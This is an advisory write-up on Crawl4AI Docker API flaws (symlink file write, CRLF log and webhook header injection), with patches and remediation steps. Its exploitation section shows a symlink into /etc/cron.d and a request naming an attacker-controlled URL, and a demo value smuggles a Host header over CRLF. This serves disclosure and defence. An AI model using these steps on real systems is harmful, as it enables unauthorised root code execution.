CVEReports

GHSA-7CX2-G3H9-382P: Multiple Vulnerabilities in Crawl4AI Docker API (Arbitrary File Write, SSRF, CRLF Log Injection)

Alon Barad
Software Engineer

Jun 16, 2026 · 6 min read

Executive Summary (TL;DR)

The Crawl4AI Docker API server, version 0.8.7 and earlier, validates output_path with a string prefix check that does not resolve symlinks, which leads to arbitrary file write and potential RCE. It also fails to sanitize log input and webhook headers, allowing log manipulation and header injection into outgoing webhook requests. Version 0.8.8 addresses these issues.

An in-depth technical analysis of multiple security vulnerabilities in the self-hosted Docker API server of Crawl4AI up to version 0.8.7. These flaws include a critical arbitrary file write via symlink traversal and TOCTOU weakness, CRLF log injection, webhook header injection, and SSRF filter gaps. These have been remediated in version 0.8.8.

Vulnerability Overview

Crawl4AI (crawl4ai) is a high-performance web crawler that prepares web pages for Large Language Model (LLM) and Retrieval-Augmented Generation (RAG) pipelines. This report concerns its self-hosted Docker API server deployment.

To allow users to retrieve rendered visual assets, the API endpoints /screenshot and /pdf accept an optional parameter named output_path. This parameter determines where generated output files are saved on the container's filesystem.

In Crawl4AI version 0.8.7 and earlier, the path containment checks and request parameter validation were insufficient to confine writes to the intended output directory. This report details a primary Arbitrary File Write vulnerability caused by symlink following and a Time-of-Check to Time-of-Use (TOCTOU) weakness, alongside CRLF Log Injection, Webhook Request-Header Injection, and Server-Side Request Forgery (SSRF) filter gaps.

Root Cause Analysis

The primary vulnerability stems from an insecure validation implementation in the validate_output_path() function in deploy/docker/utils.py. The function was designed to prevent path traversal (CWE-22) by checking whether the target path resolved within ALLOWED_OUTPUT_DIR. However, in version 0.8.7, this validation only performed a literal string comparison using Python's startswith() method.

Because the function did not resolve symbolic links (symlinks) with os.path.realpath, it accepted paths whose components were symlinks. An attacker who could create or reference a symlink inside ALLOWED_OUTPUT_DIR (pointing to an external directory such as /etc/cron.d or /usr/local/bin) could bypass containment. The string form of the target path (e.g., outputs/symlink_dir/malicious_file) started with the allowed prefix, but the subsequent write operation followed the symlink and wrote the output to the external target.

Furthermore, file creation was vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. Because files were opened with a plain open(..., 'wb') and no defensive flags such as O_NOFOLLOW, the operating system resolved symlinks at write time, even if the destination had been checked immediately beforehand.

Separately, the Webhook component was vulnerable to CRLF Injection (CWE-93/CWE-113) because arbitrary custom headers from the request body were forwarded to outgoing HTTP requests without character sanitization.
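The prefix-check bypass described above can be reproduced in isolation. The following is a minimal sketch, assuming a POSIX system where unprivileged symlink creation is allowed; the function names and the temporary directory layout are hypothetical stand-ins, not Crawl4AI code.

```python
import os
import tempfile


def naive_check(abs_path: str, abs_allowed: str) -> bool:
    # String-only containment test, mirroring the 0.8.7 logic described above.
    return abs_path.startswith(abs_allowed)


def resolved_check(abs_path: str, abs_allowed: str) -> bool:
    # Resolve symlinks on both sides, then compare whole path components.
    real_allowed = os.path.realpath(abs_allowed)
    real_path = os.path.realpath(abs_path)
    return os.path.commonpath([real_path, real_allowed]) == real_allowed


def demo() -> tuple:
    # Hypothetical layout: "outputs" stands in for ALLOWED_OUTPUT_DIR,
    # "outside" stands in for a sensitive directory such as /etc/cron.d.
    base = os.path.realpath(tempfile.mkdtemp())
    allowed = os.path.join(base, "outputs")
    outside = os.path.join(base, "outside")
    os.makedirs(allowed)
    os.makedirs(outside)
    # The attacker-controlled symlink inside the allowed directory.
    os.symlink(outside, os.path.join(allowed, "link"))
    target = os.path.join(allowed, "link", "cron_job")
    return naive_check(target, allowed), resolved_check(target, allowed)


if __name__ == "__main__":
    naive_ok, resolved_ok = demo()
    print("string prefix check passes:", naive_ok)
    print("resolved path check passes:", resolved_ok)
```

In this sketch the string check accepts the path while the resolved check rejects it, because the resolved target lies under the "outside" directory.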

Code Analysis

To understand the changes made to remediate these flaws, consider the diff of deploy/docker/utils.py. The vulnerable containment check in version 0.8.7 was purely string-based:

```python
# Vulnerable implementation in 0.8.7
if not abs_path.startswith(abs_allowed):
    raise HTTPException(...)
```

This code did not resolve symbolic links. In the patched version 0.8.8, the validation was hardened to resolve the physical path by calling os.path.realpath() on the parent directory before verifying containment:

```python
# Hardened implementation in 0.8.8
real_parent = os.path.realpath(os.path.dirname(abs_path))
real_path = os.path.join(real_parent, os.path.basename(abs_path))
string_ok = abs_path.startswith(abs_allowed)
real_ok = (real_path + os.sep).startswith(abs_allowed)
if not (string_ok and real_ok):
    raise HTTPException(status_code=400, detail="output_path must resolve within allowed dir")
```

To address the TOCTOU symlink-following weakness, a new writing function, write_output_file(), was introduced. It opens the file with os.O_NOFOLLOW so that the open fails if the final path component is a symlink:

```python
import os


def write_output_file(abs_path: str, data: bytes) -> None:
    os.makedirs(os.path.dirname(abs_path), exist_ok=True)
    # O_NOFOLLOW is unavailable on some platforms, hence the getattr fallback to 0.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(abs_path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
```

Additionally, the log injection vulnerability (CWE-117) was remediated by registering a CRLFSafeFilter that strips carriage returns, newlines, and non-tab control characters from all logged records. Webhook security was hardened by adding a strict regular-expression validator, sanitize_webhook_headers(), that blocks restricted headers (such as Host or Cookie) and rejects CRLF sequences in header names or values.
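The report does not reproduce the source of CRLFSafeFilter. As a rough illustration of the technique it describes (stripping CR, LF, and non-tab control characters from log records), a logging filter might look like the sketch below. The class name CRLFSafeFilterSketch, the helper sanitize_for_log, and the exact character range are assumptions, not the project's implementation.

```python
import logging
import re

# Assumed character set: all C0 control characters except tab (\x09), plus DEL.
# This covers carriage return (\x0d) and line feed (\x0a).
_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def sanitize_for_log(text: str) -> str:
    # Remove control characters so one event cannot span several log lines.
    return _CONTROL_CHARS.sub("", text)


class CRLFSafeFilterSketch(logging.Filter):
    """Hypothetical stand-in for the CRLFSafeFilter named in the text above."""

    def filter(self, record: logging.LogRecord) -> bool:
        # Render the message with its arguments first, then sanitize the
        # result, so attacker-controlled arguments are covered as well.
        record.msg = sanitize_for_log(record.getMessage())
        record.args = ()
        return True  # never drop the record, only clean it


if __name__ == "__main__":
    handler = logging.StreamHandler()
    handler.addFilter(CRLFSafeFilterSketch())
    logger = logging.getLogger("crlf_demo")
    logger.addHandler(handler)
    logger.warning("crawl requested for %s", "http://x/\r\nINFO forged entry")
```

Attaching the filter to the handler rather than to a single logger means it also applies to records that propagate from child loggers.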

Exploitation Methodology

Exploiting the Arbitrary File Write vulnerability to achieve remote code execution in a Docker environment requires a multi-step sequence. The following Mermaid diagram shows how the request passes the path validation filter:

```mermaid
graph LR
    A["POST /screenshot request"] --> B["Extract output_path parameter"]
    B --> C["validate_output_path() validation"]
    C --> D{"Is string prefix matching?"}
    D -- Yes --> E["Passes 0.8.7 startswith() check"]
    E --> F["Write file payload"]
    F --> G["Target OS resolves symlink"]
    G --> H["File written to /etc/cron.d (RCE)"]
```

To execute this attack, the adversary needs a way to create a symbolic link inside the directory defined by ALLOWED_OUTPUT_DIR. Where a shared volume or a secondary write vector is present, the attacker creates a symbolic link outputs/link pointing to a sensitive system directory such as /etc/cron.d or /etc/logrotate.d.

Once the symlink is in place, the attacker sends an unauthenticated POST request to /screenshot with the payload:

```json
{
  "url": "http://attacker-controlled-site.com/malicious_payload",
  "output_path": "link/cron_job"
}
```

The API server checks outputs/link/cron_job against the allowed prefix. Since the string begins with the correct prefix, the check succeeds. The server then writes the screenshot output (or PDF document) to the target file. Because link resolves to /etc/cron.d, the file is written to /etc/cron.d/cron_job. If a cron daemon is running in the container or on a host that shares this directory and it accepts the written file, the injected commands execute as the root user.
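The payload above places the symlink in a parent component (link/) rather than in the final component (cron_job). On POSIX systems O_NOFOLLOW only applies to the final component, so in this scenario it is the realpath check on the parent directory that rejects the request. The sketch below illustrates that difference; it assumes a POSIX system, and all directory and function names are hypothetical.

```python
import os
import tempfile


def open_nofollow(path: str) -> int:
    # Same flag combination as write_output_file(); O_NOFOLLOW is POSIX-only.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    return os.open(path, flags, 0o600)


def demo() -> dict:
    base = os.path.realpath(tempfile.mkdtemp())
    outputs = os.path.join(base, "outputs")   # stand-in for ALLOWED_OUTPUT_DIR
    outside = os.path.join(base, "outside")   # stand-in for /etc/cron.d
    os.makedirs(outputs)
    os.makedirs(outside)
    results = {}

    # Case 1: the final component is a symlink, so the open is refused
    # (ELOOP on Linux).
    os.symlink(os.path.join(outside, "victim"), os.path.join(outputs, "final_link"))
    try:
        os.close(open_nofollow(os.path.join(outputs, "final_link")))
        results["final_component_blocked"] = False
    except OSError:
        results["final_component_blocked"] = True

    # Case 2: a parent component is a symlink, which O_NOFOLLOW does not
    # inspect, so the file is created outside the allowed directory.
    os.symlink(outside, os.path.join(outputs, "link"))
    os.close(open_nofollow(os.path.join(outputs, "link", "cron_job")))
    results["parent_symlink_followed"] = os.path.exists(
        os.path.join(outside, "cron_job")
    )
    return results


if __name__ == "__main__":
    print(demo())
```

This is why the two hardening steps are complementary: the parent-directory resolution covers intermediate symlinks, and O_NOFOLLOW covers a symlink swapped in at the final component between check and write.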

Impact Assessment

The cumulative impact of the vulnerabilities disclosed under GHSA-7CX2-G3H9-382P is high. Through the primary Arbitrary File Write flaw, an unauthenticated attacker can write files to any writable location on the container filesystem. Combined with typical Docker configurations in which container services run as privileged users, this can lead directly to remote code execution (RCE) in the container.

The Webhook Header Injection vulnerability allows attackers to perform HTTP Request Smuggling, override critical headers such as Host or Authorization, and route internal requests to external attacker-controlled infrastructure. This can expose internal API keys and authorization tokens.

Additionally, the CRLF Log Injection flaw allows attackers to compromise log integrity by writing forged log entries, which could conceal malicious activity or disrupt automated Security Information and Event Management (SIEM) systems.
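To make the header injection risk concrete, the sketch below shows one way user-supplied webhook headers could be validated before being forwarded. It is an illustration only: the function name sanitize_headers_sketch, the deny-list contents, and the choice to reject rather than strip are assumptions, and the actual sanitize_webhook_headers() in 0.8.8 may differ.

```python
import re

# Header field names restricted to the RFC 9110 "token" character set.
_HEADER_NAME = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")

# Hypothetical deny-list; the report names Host, Cookie, and Authorization.
_BLOCKED = {"host", "cookie", "authorization", "content-length", "transfer-encoding"}


def _has_control_chars(value: str) -> bool:
    # Reject CR, LF, and any other control character except tab.
    return any((ord(ch) < 0x20 and ch != "\t") or ord(ch) == 0x7F for ch in value)


def sanitize_headers_sketch(headers: dict) -> dict:
    clean = {}
    for name, value in headers.items():
        # fullmatch avoids the "$ matches before a trailing newline" pitfall.
        if not _HEADER_NAME.fullmatch(name):
            raise ValueError(f"invalid header name: {name!r}")
        if name.lower() in _BLOCKED:
            raise ValueError(f"restricted header: {name!r}")
        if _has_control_chars(value):
            raise ValueError(f"control character in value of {name!r}")
        clean[name] = value
    return clean


if __name__ == "__main__":
    print(sanitize_headers_sketch({"X-Trace-Id": "abc123"}))
    try:
        sanitize_headers_sketch({"X-Note": "ok\r\nHost: attacker.example"})
    except ValueError as exc:
        print("rejected:", exc)
```

Rejecting the whole request on a bad header, instead of silently dropping the header, makes injection attempts visible to the caller and to logs.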

Mitigation & Remediation

To remediate all security issues covered under GHSA-7CX2-G3H9-382P, administrators and developers should immediately upgrade Crawl4AI deployments to version 0.8.8 or later. If using the PyPI package directly, run the following command (the quotes prevent the shell from treating > as a redirection):

```bash
pip install -U "crawl4ai>=0.8.8"
```

If using the official Docker container, pull the patched image:

```bash
docker pull unclecode/crawl4ai:0.8.8
```

As a temporary workaround or hardening measure, run the API container with a read-only root filesystem. This prevents write operations outside designated volume mounts, which limits the path traversal RCE vector to locations reachable through those mounts. Furthermore, enable API authentication using the CRAWL4AI_API_TOKEN environment variable so that endpoints require valid authentication before processing requests.
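After upgrading, the installed package version can be checked programmatically. The sketch below uses only the standard library; the helper names are hypothetical, and the parser deliberately handles only plain numeric releases, so pre-release suffixes such as rc1 are ignored rather than ordered correctly.

```python
import re
from importlib import metadata

FIXED_RELEASE = (0, 8, 8)  # first patched version according to the advisory


def parse_release(version: str) -> tuple:
    # "0.8.8" -> (0, 8, 8); stops at the first segment without leading digits.
    parts = []
    for piece in version.split("."):
        match = re.match(r"\d+", piece)
        if match is None:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def is_patched(version: str, fixed: tuple = FIXED_RELEASE) -> bool:
    return parse_release(version) >= fixed


def installed_is_patched(dist: str = "crawl4ai"):
    # Returns None when the distribution is not installed in this environment.
    try:
        return is_patched(metadata.version(dist))
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    print("crawl4ai patched:", installed_is_patched())
```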

Official Patches

unclecode: Crawl4AI Official Security Advisory (Detailed Technical Notice)

Technical Appendix

CVSS Score
8.1 / 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

Crawl4AI self-hosted Docker API server deployments <= 0.8.7

Affected Versions Detail

Product: crawl4ai (unclecode)
Affected Versions: <= 0.8.7
Fixed Version: 0.8.8

CWE ID: CWE-59 (Link Following), CWE-22 (Path Traversal)
Attack Vector: Network (AV:N)
CVSS v3.1 Score: 8.1 (High)
EPSS Score: N/A (GitHub Security Advisory)
Impact: Arbitrary File Write / Remote Code Execution
Exploit Status: PoC
KEV Status: Not Listed

MITRE ATT&CK Mapping

T1190: Exploit Public-Facing Application (Initial Access)
T1083: File and Directory Discovery (Discovery)

CWE-59: Improper Link Resolution Before File Access ('Link Following')

The application does not properly resolve symbolic links before opening files, allowing arbitrary file writes outside the restricted container outputs directory.

Known Exploits & Detection

GitHub Security Advisory Database: Responsible disclosure of Arbitrary File Write, SSRF, and credential exfiltration vulnerabilities.

Vulnerability Timeline

2026-04-13: Responsible disclosure reports submitted by independent researchers.
2026-06-01: Maintainer releases v0.8.7 addressing first-wave concerns.
2026-06-02: Security patch commit developed and merged into the main codebase.
2026-06-04: Crawl4AI v0.8.8 released resolving vulnerability pathways.
2026-06-16: Official GHSA-7CX2-G3H9-382P Advisory Published.
